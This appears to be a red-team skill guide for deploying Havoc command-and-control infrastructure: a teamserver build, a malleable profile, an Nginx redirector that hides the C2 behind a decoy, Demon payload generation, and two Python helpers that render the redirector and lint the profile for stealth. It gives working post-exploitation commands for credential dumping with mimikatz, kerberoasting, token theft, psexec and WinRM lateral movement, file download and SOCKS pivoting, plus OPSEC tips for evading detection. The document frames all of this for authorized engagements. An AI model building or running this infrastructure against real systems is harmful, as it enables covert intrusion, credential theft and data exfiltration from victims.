building-red-team-c2-infrastructure-with-havoc

Building Red Team C2 Infrastructure with Havoc


Overview


Havoc is a modern, open-source post-exploitation command and control (C2) framework created by C5pider. It offers a collaborative multi-operator interface in the style of Cobalt Strike, the Demon agent for Windows post-exploitation, malleable profiles that shape listener traffic (URIs, headers, User-Agent, sleep and jitter), and HTTP/HTTPS/SMB listeners. This skill covers deploying production-grade Havoc C2 infrastructure, a teamserver fronted by a redirector, with the OPSEC considerations an authorized red team engagement requires.

When to Use


  • When an authorized red team engagement needs a multi-operator C2 with an HTTPS beaconing agent behind redirector-fronted infrastructure
  • When you want an open-source alternative to Cobalt Strike for Windows post-exploitation
  • When building the teamserver, redirector and payload-delivery tiers as separately disposable components so that one burned host does not expose the rest
  • When assessing a blue team's detection coverage against HTTPS beaconing, process injection and in-memory .NET tradecraft

Prerequisites


  • Ubuntu 22.04 LTS or Debian 11+ (for the Teamserver)
  • Kali Linux 2023+ (for the Client)
  • VPS providers: DigitalOcean, Linode, or AWS EC2 (minimum 2GB RAM, 2 vCPU); the teamserver and the redirector go on separate hosts
  • Domain name aged 30+ days with a valid SSL certificate, pointed at the redirector rather than the teamserver
  • Written authorization for the red team engagement

Architecture


Operators connect to the teamserver on port 40056. The Demon agent only ever sees the redirector, which forwards requests for the profile's URIs to the teamserver's listener on port 443 and sends everything else to a decoy.

┌──────────────────────────────────────────────────────────────┐
│                    HAVOC C2 ARCHITECTURE                     │
├──────────────────────────────────────────────────────────────┤
│                                                              │
│  ┌──────────────┐     ┌──────────────┐     ┌──────────────┐  │
│  │  Havoc       │     │  Havoc       │     │  HTTPS       │  │
│  │  Client      │────▶│  Teamserver  │◀────│  Redirector  │  │
│  │  (Kali)      │40056│  (Ubuntu VPS)│ 443 │  (Nginx/CDN) │  │
│  └──────────────┘     └──────────────┘     └──────┬───────┘  │
│                                                   ▲ 443      │
│                                            ┌──────┴───────┐  │
│                                            │  Target Net  │  │
│                                            │  (Demon)     │  │
│                                            └──────────────┘  │
│                                                              │
└──────────────────────────────────────────────────────────────┘

Step 1: Install Havoc Teamserver


```bash
# Clone the Havoc repository
git clone https://github.com/HavocFramework/Havoc.git
cd Havoc

# Install dependencies (Ubuntu 22.04)
sudo apt update
sudo apt install -y git build-essential apt-utils cmake libfontconfig1 \
    libglu1-mesa-dev libgtest-dev libspdlog-dev libboost-all-dev \
    libncurses5-dev libgdbm-dev libssl-dev libreadline-dev libffi-dev \
    libsqlite3-dev libbz2-dev mesa-common-dev qtbase5-dev qtchooser \
    qt5-qmake qtbase5-dev-tools libqt5websockets5 libqt5websockets5-dev \
    qtdeclarative5-dev golang-go python3-dev mingw-w64 nasm

# Build the Teamserver (pre-fetch the two Go modules the build expects)
cd teamserver
go mod download golang.org/x/sys
go mod download github.com/ugorji/go
cd ..
make ts-build

# Build the Client
make client-build
```

Step 2: Configure Teamserver Profile


Create the Havoc profile (havoc.yaotl). Two settings deserve attention before this goes anywhere near a target. TrustXForwardedFor is set to true because the listener will sit behind the redirector from Step 4, which sets X-Forwarded-For; with it false every Demon appears to check in from the redirector's own IP. The operator passwords are the only thing protecting port 40056, so use long, unique values and keep the profile out of version control.

```hcl
Teamserver {
    Host = "0.0.0.0"
    Port = 40056

    Build {
        Compiler64 = "/usr/bin/x86_64-w64-mingw32-gcc"
        Compiler86 = "/usr/bin/i686-w64-mingw32-gcc"
        Nasm = "/usr/bin/nasm"
    }
}

Operators {
    user "operator1" {
        Password = "Str0ngP@ssw0rd!"
    }
    user "operator2" {
        Password = "An0th3rP@ss!"
    }
}

Listeners {
    Http {
        Name         = "HTTPS Listener"
        Hosts        = ["c2.yourdomain.com"]
        HostBind     = "0.0.0.0"
        HostRotation = "round-robin"
        PortBind     = 443
        PortConn     = 443
        Secure       = true
        UserAgent    = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"

        Uris = [
            "/api/v2/auth",
            "/api/v2/status",
            "/content/images/gallery",
        ]

        Headers = [
            "X-Requested-With: XMLHttpRequest",
            "Content-Type: application/json",
        ]

        Response {
            Headers = [
                "Content-Type: application/json",
                "Server: nginx/1.24.0",
                "X-Frame-Options: DENY",
            ]
        }
    }
}

Demon {
    Sleep  = 10
    Jitter = 30

    TrustXForwardedFor = true

    Injection {
        Spawn64 = "C:\\Windows\\System32\\notepad.exe"
        Spawn32 = "C:\\Windows\\SysWOW64\\notepad.exe"
    }
}
```

Step 3: Start Teamserver


```bash
# Start the Havoc Teamserver with the profile
./havoc server --profile ./profiles/havoc.yaotl -v
```

Expected output:

```
[*] Havoc Framework [Version: 0.7]
[*] Teamserver started on: 0.0.0.0:40056
[*] HTTPS Listener started on: 0.0.0.0:443
```

Step 4: Configure HTTPS Redirector


Set up an Nginx reverse proxy on a separate VPS as a redirector. Only requests for the URIs in the Havoc profile reach the teamserver; everything else, including scanner probes and anyone who browses to the domain, gets a redirect to a decoy site. Pair this with the teamserver's host firewall: port 443 should accept connections only from the redirector's IP and port 40056 only from operator addresses, so the teamserver itself is never directly reachable from the internet.

```nginx
# /etc/nginx/sites-available/c2-redirector
server {
    listen 443 ssl;
    server_name c2.yourdomain.com;

    ssl_certificate     /etc/letsencrypt/live/c2.yourdomain.com/fullchain.pem;
    ssl_certificate_key /etc/letsencrypt/live/c2.yourdomain.com/privkey.pem;

    # Only forward traffic matching the C2 URIs from the Havoc profile
    location /api/v2/auth {
        proxy_pass https://TEAMSERVER_IP:443;
        proxy_ssl_verify off;   # the teamserver listener presents its own self-signed certificate
        proxy_set_header Host $host;
        proxy_set_header X-Forwarded-For $remote_addr;
    }

    location /api/v2/status {
        proxy_pass https://TEAMSERVER_IP:443;
        proxy_ssl_verify off;
        proxy_set_header Host $host;
        proxy_set_header X-Forwarded-For $remote_addr;
    }

    location /content/images/gallery {
        proxy_pass https://TEAMSERVER_IP:443;
        proxy_ssl_verify off;
        proxy_set_header Host $host;
        proxy_set_header X-Forwarded-For $remote_addr;
    }

    # Redirect all other traffic to a legitimate site
    location / {
        return 301 https://www.microsoft.com;
    }
}
```
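The redirector's location list has to stay in lockstep with the profile's Uris: edit one without the other and agents silently lose their channel, or a path that should have hit the decoy gets proxied. The following Python script is an added example for this page, not code from Havoc or from the page author. It reads the Uris and Hosts lists out of havoc.yaotl with regular expressions (enough for these two fields, no HCL parser needed) and renders the server block above. It emits exact-match locations (location = /path) rather than the prefix matches shown above, on the assumption that the Demon requests the configured paths literally; if a build appends anything to the path, switch back to prefix form. The teamserver address and decoy URL are parameters, and the embedded profile excerpt is constructed for the demo.

```python
"""Render the Nginx redirector config from a Havoc profile's Uris/Hosts.

Added example for this page; not part of Havoc. Regular expressions are
sufficient for the two list fields used here. SAMPLE_PROFILE is a
constructed excerpt mirroring Step 2.
"""
import re

# Constructed profile excerpt (assumed values, not a real deployment).
SAMPLE_PROFILE = '''
Listeners {
    Http {
        Name     = "HTTPS Listener"
        Hosts    = ["c2.yourdomain.com"]
        PortBind = 443
        Secure   = true
        Uris = [
            "/api/v2/auth",
            "/api/v2/status",
            "/content/images/gallery",
        ]
    }
}
'''


def extract_list(profile_text, field):
    """Return the quoted strings inside `field = [ ... ]`, or [] if absent."""
    m = re.search(rf'\b{field}\s*=\s*\[(.*?)\]', profile_text, re.S)
    return re.findall(r'"([^"]+)"', m.group(1)) if m else []


def render_redirector_conf(profile_text, teamserver_ip,
                           decoy_url="https://www.microsoft.com"):
    """Build the server{} block: only the profile's Uris are proxied to the
    teamserver; any other path gets a 301 to the decoy."""
    uris = extract_list(profile_text, "Uris")
    hosts = extract_list(profile_text, "Hosts")
    if not uris or not hosts:
        raise ValueError("profile must define both Uris and Hosts")
    fqdn = hosts[0]   # first Host is the FQDN the certificate was issued for
    lines = [
        "server {",
        "    listen 443 ssl;",
        f"    server_name {fqdn};",
        f"    ssl_certificate     /etc/letsencrypt/live/{fqdn}/fullchain.pem;",
        f"    ssl_certificate_key /etc/letsencrypt/live/{fqdn}/privkey.pem;",
        "",
    ]
    for uri in uris:
        lines += [
            f"    location = {uri} {{",          # exact match, so /api/v2/auth.bak is NOT forwarded
            f"        proxy_pass https://{teamserver_ip}:443;",
            "        proxy_ssl_verify off;",      # teamserver listener uses a self-signed cert
            "        proxy_set_header Host $host;",
            "        proxy_set_header X-Forwarded-For $remote_addr;",
            "    }",
            "",
        ]
    lines += [
        "    location / {",
        f"        return 301 {decoy_url};",
        "    }",
        "}",
    ]
    return "\n".join(lines) + "\n"


def forwarded_paths(conf):
    """Paths the rendered config proxies; diff these against the profile before going live."""
    return re.findall(r'location = (\S+) \{', conf)


if __name__ == "__main__":
    print(render_redirector_conf(SAMPLE_PROFILE, "203.0.113.10"))
```

Run it against the real profile (`render_redirector_conf(open("profiles/havoc.yaotl").read(), TEAMSERVER_IP)`) as part of the deployment script, and keep `forwarded_paths` in a pre-flight check so a profile change that adds a URI fails loudly instead of producing a redirector that drops half the beacons.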

Step 5: Generate Demon Payload


Generate the payload from the Havoc Client GUI via Attack > Payload with these settings:

  • Agent: Demon
  • Listener: HTTPS Listener
  • Arch: x64
  • Format: Windows Exe / Windows Shellcode
  • Sleep Technique: Ekko (WaitForSingleObjectEx is the plain sleep with no memory obfuscation; Ekko, Zilean and Foliage encrypt the agent's memory while it sleeps)
  • Spawn: C:\Windows\System32\notepad.exe

The generated Demon payload connects back through:

Target -> Redirector (Nginx) -> Teamserver

Step 6: Post-Exploitation with Demon


Once a Demon session checks in, the common post-exploitation commands are listed below. Command names and syntax change between Havoc releases, so run help in the Demon console to confirm what the build you deployed supports.

```
# Session interaction
demon> whoami
demon> shell systeminfo
demon> shell ipconfig /all

# Process listing
demon> proc list

# File operations (upload writes to disk; prefer the in-memory execution below where possible)
demon> download C:\Users\target\Documents\sensitive.docx
demon> upload /tools/Rubeus.exe C:\Windows\Temp\r.exe

# In-memory .NET execution (no disk touch)
demon> dotnet inline-execute /tools/Seatbelt.exe -group=all
demon> dotnet inline-execute /tools/SharpHound.exe -c All

# Token manipulation
demon> token steal <PID>
demon> token make DOMAIN\user password

# Credential access
demon> mimikatz sekurlsa::logonpasswords
demon> dotnet inline-execute /tools/Rubeus.exe kerberoast

# Lateral movement
demon> jump psexec TARGET_HOST HTTPS_LISTENER
demon> jump winrm TARGET_HOST HTTPS_LISTENER

# Pivoting
demon> socks start 1080
demon> rportfwd start 8080 TARGET_INTERNAL 80
```

OPSEC Considerations


| Aspect | Recommendation |
|---|---|
| Domain age | Register domains 30+ days before the engagement |
| SSL certificates | Use Let's Encrypt or purchased certificates, never self-signed |
| Categorization | Submit the domain to Bluecoat/Fortiguard for categorization before use |
| Sleep/Jitter | Minimum 10 s sleep with 30%+ jitter for long-haul operations |
| User-Agent | Match the target organization's common browser user-agent |
| Kill date | Set payload expiration to the engagement end date |
| Infrastructure | Separate teamserver, redirector and phishing infrastructure |
| Payload format | Use shellcode with a custom loader instead of a raw EXE |
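The table is easy to agree with and easy to forget when a profile is edited in a hurry. The following Python linter is an added example for this page, not anything shipped with Havoc. It checks a havoc.yaotl against the rows above that live in the profile (sleep and jitter floors, TLS on 443, a domain rather than a bare IP in Hosts, a browser-like User-Agent) plus the TrustXForwardedFor and operator-password points from Step 2. The 16-character password floor and the User-Agent heuristic (a UA with no browser version token, as in the page's own example, is itself a signature) are this example's own thresholds; both sample profiles are constructed.

```python
"""Lint a Havoc profile against the OPSEC recommendations on this page.

Added example for this page; not part of Havoc. Settings are pulled out
of havoc.yaotl with regular expressions, which is enough for the scalar
and list fields checked here. Both sample profiles are constructed.
"""
import ipaddress
import re

# Constructed: a profile that violates most rows of the OPSEC table.
WEAK_PROFILE = '''
Teamserver { Host = "0.0.0.0"  Port = 40056 }
Operators { user "neo" { Password = "password1234" } }
Listeners {
    Http {
        Hosts     = ["198.51.100.7"]
        PortConn  = 8080
        Secure    = false
        UserAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
    }
}
Demon { Sleep = 2  Jitter = 15  TrustXForwardedFor = false }
'''

# Constructed: the same profile with every finding addressed.
HARDENED_PROFILE = '''
Teamserver { Host = "0.0.0.0"  Port = 40056 }
Operators { user "operator1" { Password = "Str0ngP@ssw0rd!-kept-out-of-git" } }
Listeners {
    Http {
        Hosts     = ["c2.yourdomain.com"]
        PortConn  = 443
        Secure    = true
        UserAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
    }
}
Demon { Sleep = 30  Jitter = 40  TrustXForwardedFor = true }
'''


def scalar(text, key, default=None):
    """Return the value of `key = value` as a string (quotes stripped), or default."""
    m = re.search(rf'\b{key}\s*=\s*(?:"([^"]*)"|(\S+))', text)
    if not m:
        return default
    return m.group(1) if m.group(1) is not None else m.group(2)


def string_list(text, key):
    """Return the quoted entries of `key = [ ... ]`, or [] if absent."""
    m = re.search(rf'\b{key}\s*=\s*\[(.*?)\]', text, re.S)
    return re.findall(r'"([^"]+)"', m.group(1)) if m else []


def is_ip(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def lint_profile(text, behind_redirector=True):
    """Return a list of OPSEC findings; an empty list means the profile passes."""
    findings = []
    sleep, jitter = int(scalar(text, "Sleep", 0)), int(scalar(text, "Jitter", 0))
    if sleep < 10:
        findings.append(f"Sleep={sleep}s is below the 10s floor for long-haul beaconing")
    if jitter < 30:
        findings.append(f"Jitter={jitter}% is below the 30% floor; callback timing is predictable")
    if scalar(text, "Secure") != "true":
        findings.append("Secure is not true: the listener speaks plaintext HTTP")
    if scalar(text, "PortConn") != "443":
        findings.append(f"PortConn={scalar(text, 'PortConn')}: HTTPS on a non-standard port stands out in proxy logs")
    for host in string_list(text, "Hosts"):
        if is_ip(host):
            findings.append(f"Hosts contains bare IP {host}: use an aged, categorized domain")
    ua = scalar(text, "UserAgent", "")
    if not any(tok in ua for tok in ("Chrome/", "Firefox/", "Edg/")):   # heuristic, this example's own
        findings.append("UserAgent has no browser version token; a truncated UA is itself a signature")
    if behind_redirector and scalar(text, "TrustXForwardedFor") != "true":
        findings.append("TrustXForwardedFor is false behind a redirector: every Demon logs as the redirector IP")
    for pw in re.findall(r'Password\s*=\s*"([^"]*)"', text):
        if len(pw) < 16:   # threshold is this example's own
            findings.append("Operator password shorter than 16 characters protects port 40056")
    return findings


if __name__ == "__main__":
    for name, prof in (("weak", WEAK_PROFILE), ("hardened", HARDENED_PROFILE)):
        result = lint_profile(prof)
        print(f"{name}: {len(result)} finding(s)")
        for f in result:
            print("  -", f)
```

Wire `lint_profile(open("profiles/havoc.yaotl").read())` into the same deployment script that starts the teamserver and refuse to start when the list is non-empty; a profile that fails the table should never reach a listener.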

MITRE ATT&CK Mapping


| Technique ID | Name | Phase |
|---|---|---|
| T1583.001 | Acquire Infrastructure: Domains | Resource Development |
| T1583.003 | Acquire Infrastructure: Virtual Private Server | Resource Development |
| T1587.001 | Develop Capabilities: Malware | Resource Development |
| T1071.001 | Application Layer Protocol: Web Protocols | Command and Control |
| T1573.002 | Encrypted Channel: Asymmetric Cryptography | Command and Control |
| T1090.002 | Proxy: External Proxy | Command and Control |
| T1105 | Ingress Tool Transfer | Command and Control |
| T1055 | Process Injection | Defense Evasion |
